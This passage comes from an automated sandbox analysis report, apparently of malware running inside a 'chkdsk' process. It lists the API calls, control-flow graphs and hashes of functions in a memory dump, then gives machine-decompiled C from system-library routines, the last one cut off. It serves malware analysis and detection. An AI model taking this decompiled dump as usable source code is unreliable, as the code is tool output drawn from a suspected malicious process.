                                          • Opcode Fuzzy Hash: 09a693ab53f5b77bfa46604cbe96ab275ae47f1b3c9725a3eef587ad564fd1d8
                                          • Instruction Fuzzy Hash: 5A01D832A502187AEB2096D59C43FFE7B5C9F46F51F040119FF04BA1C2EB95690647F5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00097680 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 353 97680-9768f 354 97698-976ca call acb60 call 9a140 call a5aa0 353->354 355 97693 call abf80 353->355 362 976cc-976de PostThreadMessageW 354->362 363 976fe-97702 354->363 355->354 364 976fd 362->364 365 976e0-976fb call 998a0 PostThreadMessageW 362->365 364->363 365->364
                                          APIs
                                          • PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 000976DA
                                          • PostThreadMessageW.USER32(0000000D,00008003,00000000,?,00000000), ref: 000976FB
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_90000_chkdsk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: 25af1c734532a81ca7ba9eb524d0be4fa31931f0d13e5fbae633e88c13e8d855
                                          • Instruction ID: 415cbd060aee58b8ae5418c18163d6f9c606613e95f24094997dd1c4de9f1568
                                          • Opcode Fuzzy Hash: 25af1c734532a81ca7ba9eb524d0be4fa31931f0d13e5fbae633e88c13e8d855
                                          • Instruction Fuzzy Hash: 9D018431A902287BEB20A6959C43FFE776CAB45F51F040119FB04BA1C2EA94790547EA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0009A140 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 563 9a140-9a169 call acdb0 566 9a16b-9a16e 563->566 567 9a16f-9a17d call ad1d0 563->567 570 9a18d-9a19e call ab500 567->570 571 9a17f-9a18a call ad450 567->571 576 9a1a0-9a1b4 LdrLoadDll 570->576 577 9a1b7-9a1ba 570->577 571->570 576->577
                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0009A1B2
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_90000_chkdsk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: 8e0004b4359ee1ae85549364c5de1ea6928f237d7e117aa9fb86d6b02b35fb04
                                          • Instruction ID: e51e4d53f956fdb18039a5006dafda3ad46de06f15cbc678322b0709c60b5c48
                                          • Opcode Fuzzy Hash: 8e0004b4359ee1ae85549364c5de1ea6928f237d7e117aa9fb86d6b02b35fb04
                                          • Instruction Fuzzy Hash: 99011EB5E0020DBBDF10EAE4DC42FDEB7B89B55308F0041A5A90997242F631EB14CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 000AA690 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 581 aa690-aa6e8 call aaf60 CreateProcessInternalW
                                          APIs
                                          • CreateProcessInternalW.KERNEL32(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,?,?,?,?), ref: 000AA6E4
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_90000_chkdsk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateInternalProcess
                                          • String ID:
                                          • API String ID: 2186235152-0
                                          • Opcode ID: 876076b5dbb47a892ddfedc491b322af51d313241269a642b7957940f7f79bb3
                                          • Instruction ID: 6283380da79a0daf5a495f1b4e8488a8b1960ee1a890cde8fe80900c81105c3e
                                          • Opcode Fuzzy Hash: 876076b5dbb47a892ddfedc491b322af51d313241269a642b7957940f7f79bb3
                                          • Instruction Fuzzy Hash: 6F01B2B2210108BFCB58DF89DC80EEB77ADAF8C754F118258BA0D97241C630E851CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 000A9160 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 595 a9160-a917b 596 a9181-a9188 595->596 597 a917c call a5aa0 595->597 598 a918a-a91a6 call af38f CreateThread 596->598 599 a91a7-a91ac 596->599 597->596
                                          APIs
                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0009D2F0,?,?), ref: 000A919C
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_90000_chkdsk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID:
                                          • API String ID: 2422867632-0
                                          • Opcode ID: 08617f2e8f43ed77d74b6e8f872d51ba921ece6b37278981498b09bb97806d21
                                          • Instruction ID: 245ec516c3927d5344b41231f4749b1fff86454f16e7b98f50486bb3814c1656
                                          • Opcode Fuzzy Hash: 08617f2e8f43ed77d74b6e8f872d51ba921ece6b37278981498b09bb97806d21
                                          • Instruction Fuzzy Hash: BEE06D333813043BE32061E99C02FE7B38C9B85B61F54002AFA0DEA2C2D595F90142A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 000A9156 Relevance: 1.5, APIs: 1, Instructions: 32threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0009D2F0,?,?), ref: 000A919C
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_90000_chkdsk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID:
                                          • API String ID: 2422867632-0
                                          • Opcode ID: af69aab4bbfafe00aeeeb6c8681bc726d575944d437e7311a27a0ea2e220cc3b
                                          • Instruction ID: 832ac555b6c89879cfb69a561a971385d689ceb9ddaf15e874e28f40d31139d9
                                          • Opcode Fuzzy Hash: af69aab4bbfafe00aeeeb6c8681bc726d575944d437e7311a27a0ea2e220cc3b
                                          • Instruction Fuzzy Hash: 33F02B737803003BE32096E4CC43FF777949F81B10F140019F609AB2C2EAA5F90082A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 000AA5E0 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlAllocateHeap.NTDLL(000A5186,?,000A58FF,000A58FF,?,000A5186,?,?,?,?,?,00000000,00000005,00000206), ref: 000AA60D
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_90000_chkdsk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 4eeee5f58efdf21d171fa9f1326e000b1994929843c0f345beb3c8c7aaa15deb
                                          • Instruction ID: ae29bdb3e3ba9246cf94e116960e1d12a642af55ec37f8af7f453439bfc27b07
                                          • Opcode Fuzzy Hash: 4eeee5f58efdf21d171fa9f1326e000b1994929843c0f345beb3c8c7aaa15deb
                                          • Instruction Fuzzy Hash: C0E01AB12002086BDB14DF89DC45E9737ACEF88654F118154BA085B242C630F910CAB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 000AA620 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 000AA64D
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_90000_chkdsk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: a1f7dc8e7f53a3f8249f2c6d0a6452cc2d574f3e67fea06934ffed66e3b82adc
                                          • Instruction ID: b9f536ac083168ecb820cd8dd13fbb7bccb2cfdb5b9b840bdb6c431fd47441ab
                                          • Opcode Fuzzy Hash: a1f7dc8e7f53a3f8249f2c6d0a6452cc2d574f3e67fea06934ffed66e3b82adc
                                          • Instruction Fuzzy Hash: 9FE012B1200208AFDB18EF89DC49EA737ACEF88750F118158BA085B282C630E910CAB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 000AA780 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                          Download Yara Rule
                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0009D5C2,0009D5C2,?,00000000,?,?), ref: 000AA7B0
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_90000_chkdsk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: 1603bad059ca15678eb2c8229aefeef34436a6a2ffabd18c43c9bb13eb52ef96
                                          • Instruction ID: 3c53c33b4c029773eec24b7fe9ccde8f4b1a7e54cda578fd5ff121143860fe6b
                                          • Opcode Fuzzy Hash: 1603bad059ca15678eb2c8229aefeef34436a6a2ffabd18c43c9bb13eb52ef96
                                          • Instruction Fuzzy Hash: 36E01AB12002086FDB14DF89CC45EE737ADEF89654F118164BA0857242C630E8148AB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0009DA28 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNELBASE(00008003,?,?,00098233,?), ref: 0009DA5B
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_90000_chkdsk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: e22c9543408ccf2bb301c99296c2202a42c017a0b5b6a1eabdb39d3170ae88e0
                                          • Instruction ID: dc7e8c81633cf1bfe546de91d46610890a1546959ebc3f28478d62fa66680d89
                                          • Opcode Fuzzy Hash: e22c9543408ccf2bb301c99296c2202a42c017a0b5b6a1eabdb39d3170ae88e0
                                          • Instruction Fuzzy Hash: 08D05EBA7803412AFE10DBF09D46FA53B98AB5A655F4A40A5FA49DA3C3D560D0018625
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0009DA30 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNELBASE(00008003,?,?,00098233,?), ref: 0009DA5B
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_90000_chkdsk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: 785235cf212cd6fac8d19be006f72e66bb65ffde2b76f0b6724cfa02a8199225
                                          • Instruction ID: 867f073bbc9c195a80acb005c590be0c209f8404acf6e5f1b2fba76731f0e013
                                          • Opcode Fuzzy Hash: 785235cf212cd6fac8d19be006f72e66bb65ffde2b76f0b6724cfa02a8199225
                                          • Instruction Fuzzy Hash: ACD0A7717903043BFA10EAE49C43F6633CCAB49B50F454064FA09D73C3D950F4008165
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 023B8788 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 94%
                                          			E023B8788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E023B8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E0239E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E023B718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E023B8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E0239E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E023B718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E023B8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E023B8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E023B8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E0239E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E0239E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E023B718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E0239E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E02392340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E023AE679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E0239E2A8(_t322,  &_v68, _v16);
								if(E023B5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E023AE679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E0239E2A8(_t322,  &_v68, _t236);
								if(E023B5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E0239E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E0239E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E023B718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E0239E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E02392340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E023AE679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E0239E2A8(_v12,  &_v68, _v16);
							if(E023B5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E023AE679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E0239E2A8(_t322,  &_v68, _t269);
							if(E023B5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E0239E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E0239E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E023B718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E0239E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E02392340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E023AE679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E0239E2A8(_v12,  &_v68, _v16);
						if(E023B5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E023AE679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E0239E2A8(_t322,  &_v68, _t296);
						if(E023B5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E0239E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E0239E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                          0x023b8788
                                          0x023b8788
                                          0x023b8791
                                          0x023b8794
                                          0x023b8798
                                          0x023b879b
                                          0x023b879e
                                          0x023b87a1
                                          0x023b87a4
                                          0x023b87a7
                                          0x023b87aa
                                          0x023b87af
                                          0x02401ad3
                                          0x023b8b0a
                                          0x023b8b0d
                                          0x023b8b13
                                          0x023b8b19
                                          0x023b8b1f
                                          0x023b8b25
                                          0x023b8b2b
                                          0x023b8b31
                                          0x023b8b37
                                          0x023b8b3d
                                          0x023b8b46
                                          0x023b8b46
                                          0x023b87c6
                                          0x023b87d0
                                          0x02401ae0
                                          0x02401ae6
                                          0x02401af8
                                          0x02401af8
                                          0x02401afd
                                          0x02401afe
                                          0x02401b01
                                          0x02401b06
                                          0x02401b06
                                          0x023b87d6
                                          0x023b87f2
                                          0x023b87f7
                                          0x023b8807
                                          0x023b880a
                                          0x023b880f
                                          0x023b8810
                                          0x023b8813
                                          0x023b8818
                                          0x023b8818
                                          0x023b882c
                                          0x023b8831
                                          0x023b8838
                                          0x023b8908
                                          0x023b8920
                                          0x023b89f0
                                          0x023b8a08
                                          0x023b8af6
                                          0x023b8af6
                                          0x023b8af8
                                          0x023b8afb
                                          0x02401beb
                                          0x02401beb
                                          0x023b8b04
                                          0x02401bf8
                                          0x02401c0e
                                          0x02401c13
                                          0x02401c16
                                          0x02401c16
                                          0x02401bf8
                                          0x00000000
                                          0x023b8b04
                                          0x023b8a0e
                                          0x023b8a11
                                          0x023b8a14
                                          0x023b8a15
                                          0x023b8a18
                                          0x023b8a22
                                          0x023b8b59
                                          0x023b8a28
                                          0x023b8a3c
                                          0x023b8a3c
                                          0x023b8a42
                                          0x02401bb0
                                          0x02401b11
                                          0x02401b11
                                          0x00000000
                                          0x023b8a48
                                          0x023b8a51
                                          0x023b8a5b
                                          0x023b8a5e
                                          0x023b8a61
                                          0x023b8a69
                                          0x023b8a69
                                          0x023b8a6d
                                          0x00000000
                                          0x00000000
                                          0x023b8a74
                                          0x023b8a7c
                                          0x023b8a7d
                                          0x023b8a91
                                          0x023b8a93
                                          0x023b8a93
                                          0x023b8a98
                                          0x023b8a9b
                                          0x023b8aa1
                                          0x023b8aa1
                                          0x023b8aa4
                                          0x023b8aaa
                                          0x023b8ab1
                                          0x023b8ac5
                                          0x023b8ac7
                                          0x023b8ac7
                                          0x023b8ac5
                                          0x023b8ace
                                          0x02401bc9
                                          0x02401bce
                                          0x02401bd2
                                          0x02401bd2
                                          0x023b8ad8
                                          0x023b8aeb
                                          0x023b8aeb
                                          0x023b8af0
                                          0x023b8af4
                                          0x00000000
                                          0x023b8af4
                                          0x023b8a42
                                          0x023b8926
                                          0x023b8929
                                          0x023b892c
                                          0x023b892d
                                          0x023b8930
                                          0x023b8935
                                          0x023b893a
                                          0x023b8b51
                                          0x023b8940
                                          0x023b8954
                                          0x023b8954
                                          0x023b895a
                                          0x02401b63
                                          0x00000000
                                          0x023b8960
                                          0x023b8969
                                          0x023b8973
                                          0x023b8976
                                          0x023b8979
                                          0x023b897e
                                          0x023b8981
                                          0x023b8981
                                          0x023b8986
                                          0x00000000
                                          0x00000000
                                          0x02401b6e
                                          0x02401b74
                                          0x02401b7b
                                          0x02401b8f
                                          0x02401b91
                                          0x02401b91
                                          0x02401b99
                                          0x02401b9c
                                          0x02401ba2
                                          0x02401ba2
                                          0x023b898c
                                          0x023b8992
                                          0x023b8999
                                          0x023b89ad
                                          0x02401ba8
                                          0x02401ba8
                                          0x023b89ad
                                          0x023b89b6
                                          0x023b89c8
                                          0x023b89cd
                                          0x023b89d0
                                          0x023b89d0
                                          0x023b89d6
                                          0x023b89e8
                                          0x023b89e8
                                          0x023b89ed
                                          0x00000000
                                          0x023b89ed
                                          0x023b895a
                                          0x023b883e
                                          0x023b8841
                                          0x023b8844
                                          0x023b8845
                                          0x023b8848
                                          0x023b884d
                                          0x023b8852
                                          0x023b8b49
                                          0x023b8858
                                          0x023b886c
                                          0x023b886c
                                          0x023b8872
                                          0x02401b0e
                                          0x00000000
                                          0x023b8878
                                          0x023b8881
                                          0x023b888b
                                          0x023b888e
                                          0x023b8891
                                          0x023b8896
                                          0x023b8899
                                          0x023b8899
                                          0x023b889e
                                          0x00000000
                                          0x00000000
                                          0x02401b21
                                          0x02401b27
                                          0x02401b2e
                                          0x02401b42
                                          0x02401b44
                                          0x02401b44
                                          0x02401b4c
                                          0x02401b4f
                                          0x02401b55
                                          0x02401b55
                                          0x023b88a4
                                          0x023b88aa
                                          0x023b88b1
                                          0x023b88c5
                                          0x02401b5b
                                          0x02401b5b
                                          0x023b88c5
                                          0x023b88ce
                                          0x023b88e0
                                          0x023b88e5
                                          0x023b88e8
                                          0x023b88e8
                                          0x023b88ee
                                          0x023b8900
                                          0x023b8900
                                          0x023b8905
                                          0x00000000
                                          0x023b8905

                                          APIs
                                          Strings
                                          • WindowsExcludedProcs, xrefs: 023B87C1
                                          • Kernel-MUI-Language-Disallowed, xrefs: 023B8914
                                          • Kernel-MUI-Number-Allowed, xrefs: 023B87E6
                                          • Kernel-MUI-Language-SKU, xrefs: 023B89FC
                                          • Kernel-MUI-Language-Allowed, xrefs: 023B8827
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: _wcspbrk
                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                          • API String ID: 402402107-258546922
                                          • Opcode ID: 4ed419bf6994e13974859bcd3e96bf17b5c25f6688ae9beb92250a8f72667201
                                          • Instruction ID: ca34e88815e61699b71badd0aacec4f25313bfd5ceb593a0edfb78a82f13781a
                                          • Opcode Fuzzy Hash: 4ed419bf6994e13974859bcd3e96bf17b5c25f6688ae9beb92250a8f72667201
                                          • Instruction Fuzzy Hash: 6AF1E8B2D00209EFDF22DFA9C9809EEB7B9FF09304F14446AE605A7651E7349A45DF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0242822C Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 160COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 95%
                                          			E0242822C(void* __ecx, void* __edx, signed int _a4, signed int _a8) {
				char _v8;
				void* __ebx;
				signed int _t41;
				void* _t42;
				signed int* _t50;
				void* _t71;
				void* _t73;
				void* _t78;
				signed int _t81;
				void* _t84;

				_push(__ecx);
				_t81 = _a4;
				_t84 = 0x20;
				_t71 = E02445A34(_t81 + 4, _t84);
				if(_t71 < _t84) {
					_t41 = E02445A34(_t81 + 0x58, _t84);
					_pop(_t78);
					_a4 = _t41;
					__eflags = _t41 - _t84;
					if(_t41 >= _t84) {
						goto L1;
					} else {
						_t42 = E023E7DCD(1,  &_v8);
						__eflags = _t42;
						if(__eflags >= 0) {
							__eflags = E0242810D(_t71, _t78, __eflags, 0x40000000, _v8, L"Bias", 4, _t81, 4);
							if(__eflags < 0) {
								L14:
								_a4 = 0;
								_t73 = E0242810D(_t71, _t78, __eflags, 0x40000000, _v8, L"TimeZoneKeyName", 1,  &_a4, 2);
								__eflags = _t73;
								if(__eflags >= 0) {
									_a8 =  *(_t81 + 0x1ac) & 0x000000ff;
									_t50 =  &_a8;
									goto L16;
								}
							} else {
								_t8 = _t71 + 2; // 0x2
								__eflags = E0242810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardName", 1, _t81 + 4, _t71 + _t8);
								if(__eflags < 0) {
									goto L14;
								} else {
									_t71 = 4;
									__eflags = E0242810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardBias", _t71, _t81 + 0x54, _t71);
									if(__eflags < 0) {
										goto L14;
									} else {
										__eflags = E0242810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardStart", 3, _t81 + 0x44, 0x10);
										if(__eflags < 0) {
											goto L14;
										} else {
